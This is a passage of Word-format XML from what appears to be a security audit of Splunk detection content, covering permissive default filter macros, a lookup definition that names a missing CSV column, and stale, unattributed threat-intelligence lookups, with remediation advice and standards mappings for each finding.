          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval ... split($b64in$,"")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); numerous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter</w:t>
      </w:r>
      <w:r>
        <w:t>/allow-list macros (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kube_allowed_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_ecr_users*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>excluded_cloud_binaries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cisco_isovalent_allowed_images</w:t>
      </w:r>
      <w:r>
        <w:t>, etc.) shipping permissive defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A number of filter macros ship as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (match everything — i.e. no filtering) or as allow-lists pre-populated with example/permissive values (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>United States</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*splunk*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Helm/3.13.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). These are intended customer-tuning stubs, but if deployed unchanged they neutralize the associated detection (a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> false-positive-reduction macro passes all events, and an over-broad allow-list suppresses true positives). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>base64decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interpolates the macro argument </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$b64in$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly into an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the argument is author/detection-controlled (not end-user input), so it is a maintainability note rather than an injection sink. I confirmed no macro definition contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>collect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sendemail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>runshellscript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sendalert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>loadjob</w:t>
      </w:r>
      <w:r>
        <w:t>, so there is no server-side side-effect sink in the macro set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Macro arguments are populated by detection YAML, not by end users. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as an injection; a detection-efficacy / secure-default concern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Grep of macro definitions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros_dep.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) shows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> defaults and the absence of write/side-effect commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stubs with a clearly-false default (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search index=__no_filter_configured__</w:t>
      </w:r>
      <w:r>
        <w:t>) or document a required post-install tuning step; tighten shipped allow-lists to empty or narrowly-scoped examples; keep argument interpolation but document that macro args must be content-author controlled. Explanation: a secure default fails closed (detection stays active) rather than silently disabling itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 (Insecure Default Initialization) / CWE-183 (permissive allow-list). OWASP A05:2021 Security Misconfiguration. ASVS v4 1.1 / 8.1. ATT&amp;CK Defense Evasion T1562 (Impair Defenses) — the risk these guard against. NIST 800-53 Rev5 CM-6 (Configuration Settings), SI-4. NIST CSF 2.0 PR.PS-01. ISO 27001:2022 A.8.9 (Configuration management). SANS/CERT: secure defaults. Best practice: fail-closed detection content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 Initialization of a Resource with an Insecure Default; CWE-183. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-6 Configuration Settings, SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security, DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-05 — Lookup WILDCARD match_type references a column absent from the CSV (suspicious_ports_list)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Not exploitable (config correctness).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lookups/csv/suspicious_ports_list.yml:9-10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A (correctness / config defect)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/suspicious_ports_list.yml:9-10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/suspicious_ports_list.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header. Excerpt (yml):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>9    match_type:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10   - WILDCARD(file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">CSV header: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest_port,comment,confidence,category</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The lookup definition declares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WILDCARD(file)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but the CSV has no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field. The match_type references a non-existent column, so the wildcard directive is inert (and at best a confusing/mis-copied definition). This will not throw a hard error but silently disables intended wildcard matching semantics on whatever field was meant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> None. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (config correctness).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Compared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match_type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header row (both read with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cat -n</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Point </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match_type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at a column that exists (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WILDCARD(dest_port)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if wildcard port patterns are intended) or remove the directive if exact match is wanted. Validate lookup definitions against their CSV headers in CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 (Improper Input Validation) analog / CWE-665 (Improper Initialization). OWASP A05:2021. ASVS v4 1.1. NIST 800-53 Rev5 SA-11, CM-6. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.9. Best practice: Splunk lookup definition / transforms.conf field consistency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-665. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation, CM-6 Configuration Settings. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-06 — Stale and unattributed threat-intelligence lookups (SSLBL, dynamic DNS providers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Detection-coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lookups/csv/sslbl_ssl_certificate_blacklist.csv; lookups/csv/dynamic_dns_providers_default.csv/.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A (intel freshness / provenance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/sslbl_ssl_certificate_blacklist.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (6,794 rows; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Listingdate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> range 2014-05-04 … 2025-04-02); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/dynamic_dns_providers_default.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (91,975 rows, all of form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.&lt;domain&gt;, True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 0 provenance/source field, 0 dates); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/dynamic_dns_providers_default.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> description "should not be modified".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Two blocklist-style lookups ship as static CSV with no provenance, no source URL, and no refresh mechanism. The SSLBL list's most recent entry is 2025-04-02 — roughly 18 months before today (2026-10-06) — so TLS-fingerprint detections keyed on it will miss anything newer and may fire on sinkholed/re-issued certs. The 91,975-row dynamic-DNS provider list has no attribution (abuse.ch / which feed, when pulled), which impedes validation and legal/licensing review, and the "should not be modified" note discourages the operator from updating it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These are reference data consumed by detections (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/network/detect_hosts_connecting_to_dynamic_domain_providers.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>isDynDNS_default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; SSLBL via firewall/TLS detections). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t>; detection-coverage and data-governance risk (stale intel = missed detections / false positives).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Row counts and date ranges computed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSV reader over copies in scratch; no source/attribution column present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Add provenance columns (source feed, pull date, license) or a documented refresh job (contentctl pipeline step) that re-pulls from the authoritative feed; version and date-stamp the lookups; replace "should not be modified" with a documented update procedure. For time-sensitive intel, prefer a scheduled lookup-gen search or TA over a baked-in CSV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 (Use of Unmaintained Third-Party Components) analog; CWE-672 (stale data). OWASP A06:2021 Vulnerable and Outdated Components. ASVS v4 1.14 / 10.3. ATT&amp;CK — detection coverage (T1071/T1568 dynamic resolution the lists target). NIST 800-53 Rev5 SI-5 (Security Alerts), RA-5, SA-9. NIST CSF 2.0 ID.RA / PR.PS. ISO 27001:2022 A.5.7 (Threat intelligence), A.8.8. SANS/CERT: intel freshness. Best practice: documented intel feed lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-672. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
